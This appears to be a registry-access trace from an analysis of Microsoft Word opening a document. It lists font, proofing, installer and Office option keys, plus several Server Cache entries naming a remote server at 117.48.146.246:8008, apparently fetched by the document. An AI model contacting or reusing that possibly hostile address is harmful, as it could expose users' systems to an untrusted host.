HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Myanmar Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nirmala UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nirmala UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe MDL2 Assets
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Emoji
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Historic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Small
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Subheading
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Heading
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Display
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sitka Banner
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Yu Gothic UI Semilight
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
HoloLens MDL2 Assets
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DengXian
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DengXian
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\267BA
267BA
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Malgun Gothic Semilight
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft JhengHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Microsoft YaHei UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MathFonts
@Yu Gothic UI Semilight
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://117.48.146.246:8008/
Expiration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\267BA
267BA
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
u".
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
v".
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
nc*
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
td*
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
ag*
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://117.48.146.246:8008/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
